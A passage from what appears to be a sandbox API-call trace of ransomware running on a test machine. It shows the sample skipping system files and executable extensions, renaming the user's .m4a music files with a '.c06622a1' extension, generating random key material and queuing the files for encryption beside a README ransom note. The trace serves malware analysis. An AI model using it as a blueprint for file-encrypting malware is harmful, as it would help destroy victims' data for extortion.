(_String="thumbs.db") returned 0x9 [0151.190] _wcsicmp (_Str1="386", _Str2="m4a") returned -58 [0151.190] wcslen (_String="386") returned 0x3 [0151.190] _wcsicmp (_Str1="adv", _Str2="m4a") returned -12 [0151.190] wcslen (_String="adv") returned 0x3 [0151.190] _wcsicmp (_Str1="ani", _Str2="m4a") returned -12 [0151.190] wcslen (_String="ani") returned 0x3 [0151.190] _wcsicmp (_Str1="bat", _Str2="m4a") returned -11 [0151.190] wcslen (_String="bat") returned 0x3 [0151.190] _wcsicmp (_Str1="bin", _Str2="m4a") returned -11 [0151.190] wcslen (_String="bin") returned 0x3 [0151.190] _wcsicmp (_Str1="cab", _Str2="m4a") returned -10 [0151.190] wcslen (_String="cab") returned 0x3 [0151.190] _wcsicmp (_Str1="cmd", _Str2="m4a") returned -10 [0151.190] wcslen (_String="cmd") returned 0x3 [0151.190] _wcsicmp (_Str1="com", _Str2="m4a") returned -10 [0151.190] wcslen (_String="com") returned 0x3 [0151.190] _wcsicmp (_Str1="cpl", _Str2="m4a") returned -10 [0151.190] wcslen (_String="cpl") returned 0x3 [0151.190] _wcsicmp (_Str1="cur", _Str2="m4a") returned -10 [0151.190] wcslen (_String="cur") returned 0x3 [0151.190] _wcsicmp (_Str1="deskthemepack", _Str2="m4a") returned -9 [0151.190] wcslen (_String="deskthemepack") returned 0xd [0151.190] _wcsicmp (_Str1="diagcab", _Str2="m4a") returned -9 [0151.190] wcslen (_String="diagcab") returned 0x7 [0151.191] _wcsicmp (_Str1="diagcfg", _Str2="m4a") returned -9 [0151.191] wcslen (_String="diagcfg") returned 0x7 [0151.191] _wcsicmp (_Str1="diagpkg", _Str2="m4a") returned -9 [0151.191] wcslen (_String="diagpkg") returned 0x7 [0151.191] _wcsicmp (_Str1="dll", _Str2="m4a") returned -9 [0151.191] wcslen (_String="dll") returned 0x3 [0151.191] _wcsicmp (_Str1="drv", _Str2="m4a") returned -9 [0151.191] wcslen (_String="drv") returned 0x3 [0151.191] _wcsicmp (_Str1="exe", _Str2="m4a") returned -8 [0151.191] wcslen (_String="exe") returned 0x3 [0151.191] _wcsicmp (_Str1="hlp", _Str2="m4a") returned -5 [0151.191] wcslen (_String="hlp") returned 0x3 [0151.191] _wcsicmp (_Str1="icl", _Str2="m4a") returned -4 [0151.191] wcslen (_String="icl") returned 0x3 [0151.191] _wcsicmp (_Str1="icns", _Str2="m4a") returned -4 [0151.191] wcslen (_String="icns") returned 0x4 [0151.191] _wcsicmp (_Str1="ico", _Str2="m4a") returned -4 [0151.191] wcslen (_String="ico") returned 0x3 [0151.191] _wcsicmp (_Str1="ics", _Str2="m4a") returned -4 [0151.191] wcslen (_String="ics") returned 0x3 [0151.191] _wcsicmp (_Str1="idx", _Str2="m4a") returned -4 [0151.191] wcslen (_String="idx") returned 0x3 [0151.191] _wcsicmp (_Str1="ldf", _Str2="m4a") returned -1 [0151.191] wcslen (_String="ldf") returned 0x3 [0151.191] _wcsicmp (_Str1="lnk", _Str2="m4a") returned -1 [0151.191] wcslen (_String="lnk") returned 0x3 [0151.191] _wcsicmp (_Str1="mod", _Str2="m4a") returned 59 [0151.191] wcslen (_String="mod") returned 0x3 [0151.191] _wcsicmp (_Str1="mpa", _Str2="m4a") returned 60 [0151.191] wcslen (_String="mpa") returned 0x3 [0151.191] _wcsicmp (_Str1="msc", _Str2="m4a") returned 63 [0151.191] wcslen (_String="msc") returned 0x3 [0151.191] _wcsicmp (_Str1="msp", _Str2="m4a") returned 63 [0151.191] wcslen (_String="msp") returned 0x3 [0151.191] _wcsicmp (_Str1="msstyles", _Str2="m4a") returned 63 [0151.191] wcslen (_String="msstyles") returned 0x8 [0151.191] _wcsicmp (_Str1="msu", _Str2="m4a") returned 63 [0151.192] wcslen (_String="msu") returned 0x3 [0151.192] _wcsicmp (_Str1="nls", _Str2="m4a") returned 1 [0151.192] wcslen (_String="nls") returned 0x3 [0151.192] _wcsicmp (_Str1="nomedia", _Str2="m4a") returned 1 [0151.192] wcslen (_String="nomedia") returned 0x7 [0151.192] _wcsicmp (_Str1="ocx", _Str2="m4a") returned 2 [0151.192] wcslen (_String="ocx") returned 0x3 [0151.192] _wcsicmp (_Str1="prf", _Str2="m4a") returned 3 [0151.192] wcslen (_String="prf") returned 0x3 [0151.192] _wcsicmp (_Str1="ps1", _Str2="m4a") returned 3 [0151.192] wcslen (_String="ps1") returned 0x3 [0151.192] _wcsicmp (_Str1="rom", _Str2="m4a") returned 5 [0151.192] wcslen (_String="rom") returned 0x3 [0151.192] _wcsicmp (_Str1="rtp", _Str2="m4a") returned 5 [0151.192] wcslen (_String="rtp") returned 0x3 [0151.192] _wcsicmp (_Str1="scr", _Str2="m4a") returned 6 [0151.192] wcslen (_String="scr") returned 0x3 [0151.192] _wcsicmp (_Str1="shs", _Str2="m4a") returned 6 [0151.192] wcslen (_String="shs") returned 0x3 [0151.192] _wcsicmp (_Str1="spl", _Str2="m4a") returned 6 [0151.192] wcslen (_String="spl") returned 0x3 [0151.192] _wcsicmp (_Str1="sys", _Str2="m4a") returned 6 [0151.192] wcslen (_String="sys") returned 0x3 [0151.192] _wcsicmp (_Str1="theme", _Str2="m4a") returned 7 [0151.192] wcslen (_String="theme") returned 0x5 [0151.192] _wcsicmp (_Str1="themepack", _Str2="m4a") returned 7 [0151.192] wcslen (_String="themepack") returned 0x9 [0151.192] _wcsicmp (_Str1="wpx", _Str2="m4a") returned 10 [0151.192] wcslen (_String="wpx") returned 0x3 [0151.192] _wcsicmp (_Str1="lock", _Str2="m4a") returned -1 [0151.192] wcslen (_String="lock") returned 0x4 [0151.192] _wcsicmp (_Str1="key", _Str2="m4a") returned -2 [0151.192] wcslen (_String="key") returned 0x3 [0151.192] _wcsicmp (_Str1="hta", _Str2="m4a") returned -5 [0151.192] wcslen (_String="hta") returned 0x3 [0151.192] _wcsicmp (_Str1="msi", _Str2="m4a") returned 63 [0151.193] wcslen (_String="msi") returned 0x3 [0151.193] _wcsicmp (_Str1="pdb", _Str2="m4a") returned 3 [0151.193] wcslen (_String="pdb") returned 0x3 [0151.193] _wcsicmp (_Str1="sql", _Str2="m4a") returned 6 [0151.193] wcslen (_String="sql") returned 0x3 [0151.193] _wcsicmp (_Str1="sqlite", _Str2="m4a") returned 6 [0151.193] wcslen (_String="sqlite") returned 0x6 [0151.193] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\z3-tnc")) returned 0x10 [0151.193] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0151.193] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC" [0151.193] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC") returned 0x2e [0151.193] wcscpy (in: _Dest=0x45000ee, _Source="m6oEvZ.m4a" | out: _Dest="m6oEvZ.m4a") returned="m6oEvZ.m4a" [0151.193] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC\\m6oEvZ.m4a", dwFileAttributes=0x80) returned 1 [0151.193] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC\\m6oEvZ.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\z3-tnc\\m6oevz.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x674 [0151.193] SetFilePointerEx (in: hFile=0x674, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0151.193] ReadFile (in: hFile=0x674, lpBuffer=0x3fe8f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe984, lpOverlapped=0x0 | out: lpBuffer=0x3fe8f4*, lpNumberOfBytesRead=0x3fe984*=0x90, lpOverlapped=0x0) returned 1 [0151.194] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe8f4, Length=0x80) returned 0xc0ecf268 [0151.194] RtlComputeCrc32 (PartialCrc=0xf268, Buffer=0x3fe8f4, Length=0x80) returned 0x8eaa08ab [0151.194] RtlComputeCrc32 (PartialCrc=0x8ab, Buffer=0x3fe8f4, Length=0x80) returned 0x7f366cd [0151.194] RtlComputeCrc32 (PartialCrc=0x66cd, Buffer=0x3fe8f4, Length=0x80) returned 0x73c328a3 [0151.194] RtlComputeCrc32 (PartialCrc=0x28a3, Buffer=0x3fe8f4, Length=0x80) returned 0xf11c5e95 [0151.194] CloseHandle (hObject=0x674) returned 1 [0151.194] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0151.195] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC\\m6oEvZ.m4a" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC\\m6oEvZ.m4a") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC\\m6oEvZ.m4a" [0151.195] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC\\m6oEvZ.m4a") returned 0x39 [0151.195] wcscpy (in: _Dest=0x451010a, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0151.195] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC\\m6oEvZ.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\z3-tnc\\m6oevz.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC\\m6oEvZ.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\z3-tnc\\m6oevz.m4a.c06622a1"), dwFlags=0x8) returned 1 [0151.291] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC\\m6oEvZ.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\z3-tnc\\m6oevz.m4a.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x674 [0151.292] CreateIoCompletionPort (FileHandle=0x674, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0151.292] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4700020 [0151.296] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6668057a [0151.296] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2e3351d4 [0151.296] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6f037c7d [0151.296] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xc66f47c [0151.296] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2abebe24 [0151.296] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x54188a4e [0151.296] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x34225a86 [0151.296] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x79f8729b [0151.299] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4700094, Length=0x80) returned 0x37fa3e3f [0151.299] RtlComputeCrc32 (PartialCrc=0x3e3f, Buffer=0x4700094, Length=0x80) returned 0xb0d319ac [0151.299] RtlComputeCrc32 (PartialCrc=0x19ac, Buffer=0x4700094, Length=0x80) returned 0x5eec733f [0151.299] RtlComputeCrc32 (PartialCrc=0x733f, Buffer=0x4700094, Length=0x80) returned 0xcdffef21 [0151.299] RtlComputeCrc32 (PartialCrc=0xef21, Buffer=0x4700094, Length=0x80) returned 0x6a4a5711 [0151.299] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4700020) returned 1 [0151.299] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0151.300] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0151.300] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x508a5e30, ftCreationTime.dwHighDateTime=0x1d5e746, ftLastAccessTime.dwLowDateTime=0x60b271e0, ftLastAccessTime.dwHighDateTime=0x1d5dda4, ftLastWriteTime.dwLowDateTime=0x60b271e0, ftLastWriteTime.dwHighDateTime=0x1d5dda4, nFileSizeHigh=0x0, nFileSizeLow=0x15c01, dwReserved0=0x0, dwReserved1=0x0, cFileName="o9e4teOb.m4a", cAlternateFileName="")) returned 1 [0151.300] _wcsicmp (_Str1="o9e4teOb.m4a", _Str2="README.c06622a1.TXT") returned -3 [0151.300] wcsstr (_Str="o9e4teOb.m4a", _SubStr="README") returned 0x0 [0151.300] _wcsicmp (_Str1="autorun.inf", _Str2="o9e4teOb.m4a") returned -14 [0151.300] wcslen (_String="autorun.inf") returned 0xb [0151.300] _wcsicmp (_Str1="boot.ini", _Str2="o9e4teOb.m4a") returned -13 [0151.300] wcslen (_String="boot.ini") returned 0x8 [0151.300] _wcsicmp (_Str1="bootfont.bin", _Str2="o9e4teOb.m4a") returned -13 [0151.300] wcslen (_String="bootfont.bin") returned 0xc [0151.300] _wcsicmp (_Str1="bootsect.bak", _Str2="o9e4teOb.m4a") returned -13 [0151.300] wcslen (_String="bootsect.bak") returned 0xc [0151.300] _wcsicmp (_Str1="desktop.ini", _Str2="o9e4teOb.m4a") returned -11 [0151.300] wcslen (_String="desktop.ini") returned 0xb [0151.300] _wcsicmp (_Str1="iconcache.db", _Str2="o9e4teOb.m4a") returned -6 [0151.300] wcslen (_String="iconcache.db") returned 0xc [0151.300] _wcsicmp (_Str1="ntldr", _Str2="o9e4teOb.m4a") returned -1 [0151.300] wcslen (_String="ntldr") returned 0x5 [0151.300] _wcsicmp (_Str1="ntuser.dat", _Str2="o9e4teOb.m4a") returned -1 [0151.300] wcslen (_String="ntuser.dat") returned 0xa [0151.300] _wcsicmp (_Str1="ntuser.dat.log", _Str2="o9e4teOb.m4a") returned -1 [0151.300] wcslen (_String="ntuser.dat.log") returned 0xe [0151.300] _wcsicmp (_Str1="ntuser.ini", _Str2="o9e4teOb.m4a") returned -1 [0151.300] wcslen (_String="ntuser.ini") returned 0xa [0151.300] _wcsicmp (_Str1="thumbs.db", _Str2="o9e4teOb.m4a") returned 5 [0151.300] wcslen (_String="thumbs.db") returned 0x9 [0151.300] _wcsicmp (_Str1="386", _Str2="m4a") returned -58 [0151.300] wcslen (_String="386") returned 0x3 [0151.300] _wcsicmp (_Str1="adv", _Str2="m4a") returned -12 [0151.300] wcslen (_String="adv") returned 0x3 [0151.300] _wcsicmp (_Str1="ani", _Str2="m4a") returned -12 [0151.300] wcslen (_String="ani") returned 0x3 [0151.300] _wcsicmp (_Str1="bat", _Str2="m4a") returned -11 [0151.300] wcslen (_String="bat") returned 0x3 [0151.301] _wcsicmp (_Str1="bin", _Str2="m4a") returned -11 [0151.301] wcslen (_String="bin") returned 0x3 [0151.301] _wcsicmp (_Str1="cab", _Str2="m4a") returned -10 [0151.301] wcslen (_String="cab") returned 0x3 [0151.301] _wcsicmp (_Str1="cmd", _Str2="m4a") returned -10 [0151.301] wcslen (_String="cmd") returned 0x3 [0151.301] _wcsicmp (_Str1="com", _Str2="m4a") returned -10 [0151.301] wcslen (_String="com") returned 0x3 [0151.301] _wcsicmp (_Str1="cpl", _Str2="m4a") returned -10 [0151.301] wcslen (_String="cpl") returned 0x3 [0151.301] _wcsicmp (_Str1="cur", _Str2="m4a") returned -10 [0151.301] wcslen (_String="cur") returned 0x3 [0151.301] _wcsicmp (_Str1="deskthemepack", _Str2="m4a") returned -9 [0151.301] wcslen (_String="deskthemepack") returned 0xd [0151.301] _wcsicmp (_Str1="diagcab", _Str2="m4a") returned -9 [0151.301] wcslen (_String="diagcab") returned 0x7 [0151.301] _wcsicmp (_Str1="diagcfg", _Str2="m4a") returned -9 [0151.301] wcslen (_String="diagcfg") returned 0x7 [0151.301] _wcsicmp (_Str1="diagpkg", _Str2="m4a") returned -9 [0151.301] wcslen (_String="diagpkg") returned 0x7 [0151.301] _wcsicmp (_Str1="dll", _Str2="m4a") returned -9 [0151.301] wcslen (_String="dll") returned 0x3 [0151.301] _wcsicmp (_Str1="drv", _Str2="m4a") returned -9 [0151.301] wcslen (_String="drv") returned 0x3 [0151.301] _wcsicmp (_Str1="exe", _Str2="m4a") returned -8 [0151.301] wcslen (_String="exe") returned 0x3 [0151.301] _wcsicmp (_Str1="hlp", _Str2="m4a") returned -5 [0151.301] wcslen (_String="hlp") returned 0x3 [0151.301] _wcsicmp (_Str1="icl", _Str2="m4a") returned -4 [0151.301] wcslen (_String="icl") returned 0x3 [0151.301] _wcsicmp (_Str1="icns", _Str2="m4a") returned -4 [0151.301] wcslen (_String="icns") returned 0x4 [0151.301] _wcsicmp (_Str1="ico", _Str2="m4a") returned -4 [0151.301] wcslen (_String="ico") returned 0x3 [0151.301] _wcsicmp (_Str1="ics", _Str2="m4a") returned -4 [0151.301] wcslen (_String="ics") returned 0x3 [0151.301] _wcsicmp (_Str1="idx", _Str2="m4a") returned -4 [0151.301] wcslen (_String="idx") returned 0x3 [0151.302] _wcsicmp (_Str1="ldf", _Str2="m4a") returned -1 [0151.302] wcslen (_String="ldf") returned 0x3 [0151.302] _wcsicmp (_Str1="lnk", _Str2="m4a") returned -1 [0151.302] wcslen (_String="lnk") returned 0x3 [0151.302] _wcsicmp (_Str1="mod", _Str2="m4a") returned 59 [0151.302] wcslen (_String="mod") returned 0x3 [0151.302] _wcsicmp (_Str1="mpa", _Str2="m4a") returned 60 [0151.302] wcslen (_String="mpa") returned 0x3 [0151.302] _wcsicmp (_Str1="msc", _Str2="m4a") returned 63 [0151.302] wcslen (_String="msc") returned 0x3 [0151.302] _wcsicmp (_Str1="msp", _Str2="m4a") returned 63 [0151.302] wcslen (_String="msp") returned 0x3 [0151.302] _wcsicmp (_Str1="msstyles", _Str2="m4a") returned 63 [0151.302] wcslen (_String="msstyles") returned 0x8 [0151.302] _wcsicmp (_Str1="msu", _Str2="m4a") returned 63 [0151.302] wcslen (_String="msu") returned 0x3 [0151.302] _wcsicmp (_Str1="nls", _Str2="m4a") returned 1 [0151.302] wcslen (_String="nls") returned 0x3 [0151.302] _wcsicmp (_Str1="nomedia", _Str2="m4a") returned 1 [0151.302] wcslen (_String="nomedia") returned 0x7 [0151.302] _wcsicmp (_Str1="ocx", _Str2="m4a") returned 2 [0151.302] wcslen (_String="ocx") returned 0x3 [0151.302] _wcsicmp (_Str1="prf", _Str2="m4a") returned 3 [0151.302] wcslen (_String="prf") returned 0x3 [0151.302] _wcsicmp (_Str1="ps1", _Str2="m4a") returned 3 [0151.302] wcslen (_String="ps1") returned 0x3 [0151.302] _wcsicmp (_Str1="rom", _Str2="m4a") returned 5 [0151.302] wcslen (_String="rom") returned 0x3 [0151.302] _wcsicmp (_Str1="rtp", _Str2="m4a") returned 5 [0151.302] wcslen (_String="rtp") returned 0x3 [0151.302] _wcsicmp (_Str1="scr", _Str2="m4a") returned 6 [0151.302] wcslen (_String="scr") returned 0x3 [0151.302] _wcsicmp (_Str1="shs", _Str2="m4a") returned 6 [0151.302] wcslen (_String="shs") returned 0x3 [0151.302] _wcsicmp (_Str1="spl", _Str2="m4a") returned 6 [0151.302] wcslen (_String="spl") returned 0x3 [0151.302] _wcsicmp (_Str1="sys", _Str2="m4a") returned 6 [0151.302] wcslen (_String="sys") returned 0x3 [0151.303] _wcsicmp (_Str1="theme", _Str2="m4a") returned 7 [0151.303] wcslen (_String="theme") returned 0x5 [0151.303] _wcsicmp (_Str1="themepack", _Str2="m4a") returned 7 [0151.303] wcslen (_String="themepack") returned 0x9 [0151.303] _wcsicmp (_Str1="wpx", _Str2="m4a") returned 10 [0151.303] wcslen (_String="wpx") returned 0x3 [0151.303] _wcsicmp (_Str1="lock", _Str2="m4a") returned -1 [0151.303] wcslen (_String="lock") returned 0x4 [0151.303] _wcsicmp (_Str1="key", _Str2="m4a") returned -2 [0151.303] wcslen (_String="key") returned 0x3 [0151.303] _wcsicmp (_Str1="hta", _Str2="m4a") returned -5 [0151.303] wcslen (_String="hta") returned 0x3 [0151.303] _wcsicmp (_Str1="msi", _Str2="m4a") returned 63 [0151.303] wcslen (_String="msi") returned 0x3 [0151.303] _wcsicmp (_Str1="pdb", _Str2="m4a") returned 3 [0151.303] wcslen (_String="pdb") returned 0x3 [0151.303] _wcsicmp (_Str1="sql", _Str2="m4a") returned 6 [0151.303] wcslen (_String="sql") returned 0x3 [0151.304] _wcsicmp (_Str1="sqlite", _Str2="m4a") returned 6 [0151.304] wcslen (_String="sqlite") returned 0x6 [0151.304] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\z3-tnc")) returned 0x10 [0151.304] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0151.304] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC" [0151.304] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC") returned 0x2e [0151.304] wcscpy (in: _Dest=0x45000ee, _Source="o9e4teOb.m4a" | out: _Dest="o9e4teOb.m4a") returned="o9e4teOb.m4a" [0151.304] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC\\o9e4teOb.m4a", dwFileAttributes=0x80) returned 1 [0151.317] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC\\o9e4teOb.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\z3-tnc\\o9e4teob.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0151.317] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0151.317] ReadFile (in: hFile=0x134, lpBuffer=0x3fe8f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe984, lpOverlapped=0x0 | out: lpBuffer=0x3fe8f4*, lpNumberOfBytesRead=0x3fe984*=0x90, lpOverlapped=0x0) returned 1 [0151.318] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe8f4, Length=0x80) returned 0xf2a5d58f [0151.318] RtlComputeCrc32 (PartialCrc=0xd58f, Buffer=0x3fe8f4, Length=0x80) returned 0x67264506 [0151.318] RtlComputeCrc32 (PartialCrc=0x4506, Buffer=0x3fe8f4, Length=0x80) returned 0x80fd01ba [0151.318] RtlComputeCrc32 (PartialCrc=0x1ba, Buffer=0x3fe8f4, Length=0x80) returned 0xba9faeeb [0151.319] RtlComputeCrc32 (PartialCrc=0xaeeb, Buffer=0x3fe8f4, Length=0x80) returned 0xb115767d [0151.319] CloseHandle (hObject=0x134) returned 1 [0151.319] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0151.319] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC\\o9e4teOb.m4a" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC\\o9e4teOb.m4a") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC\\o9e4teOb.m4a" [0151.319] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC\\o9e4teOb.m4a") returned 0x3b [0151.319] wcscpy (in: _Dest=0x451010e, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0151.319] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC\\o9e4teOb.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\z3-tnc\\o9e4teob.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC\\o9e4teOb.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\z3-tnc\\o9e4teob.m4a.c06622a1"), dwFlags=0x8) returned 1 [0151.325] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC\\o9e4teOb.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\z3-tnc\\o9e4teob.m4a.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x134 [0151.325] CreateIoCompletionPort (FileHandle=0x134, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0151.325] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x2f30020 [0151.329] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x29a8a961 [0151.329] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4bc7e4f1 [0151.329] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6236d339 [0151.329] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x77f61d16 [0151.329] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x31c13eea [0151.329] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x59bf726e [0151.329] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x262ab365 [0151.329] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x77431bf8 [0151.332] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2f30094, Length=0x80) returned 0xc3582220 [0151.332] RtlComputeCrc32 (PartialCrc=0x2220, Buffer=0x2f30094, Length=0x80) returned 0x520743dd [0151.332] RtlComputeCrc32 (PartialCrc=0x43dd, Buffer=0x2f30094, Length=0x80) returned 0xb6d0caff [0151.332] RtlComputeCrc32 (PartialCrc=0xcaff, Buffer=0x2f30094, Length=0x80) returned 0x21cac101 [0151.332] RtlComputeCrc32 (PartialCrc=0xc101, Buffer=0x2f30094, Length=0x80) returned 0xde9fb39a [0151.332] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2f30020) returned 1 [0151.332] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0151.332] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0151.332] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd8b12e80, ftCreationTime.dwHighDateTime=0x1d6f256, ftLastAccessTime.dwLowDateTime=0xd8b12e80, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xd8b12e80, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0xa8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0151.332] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0151.332] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf4fe6a0, ftCreationTime.dwHighDateTime=0x1d5dba5, ftLastAccessTime.dwLowDateTime=0x304c1cc0, ftLastAccessTime.dwHighDateTime=0x1d5dee1, ftLastWriteTime.dwLowDateTime=0x304c1cc0, 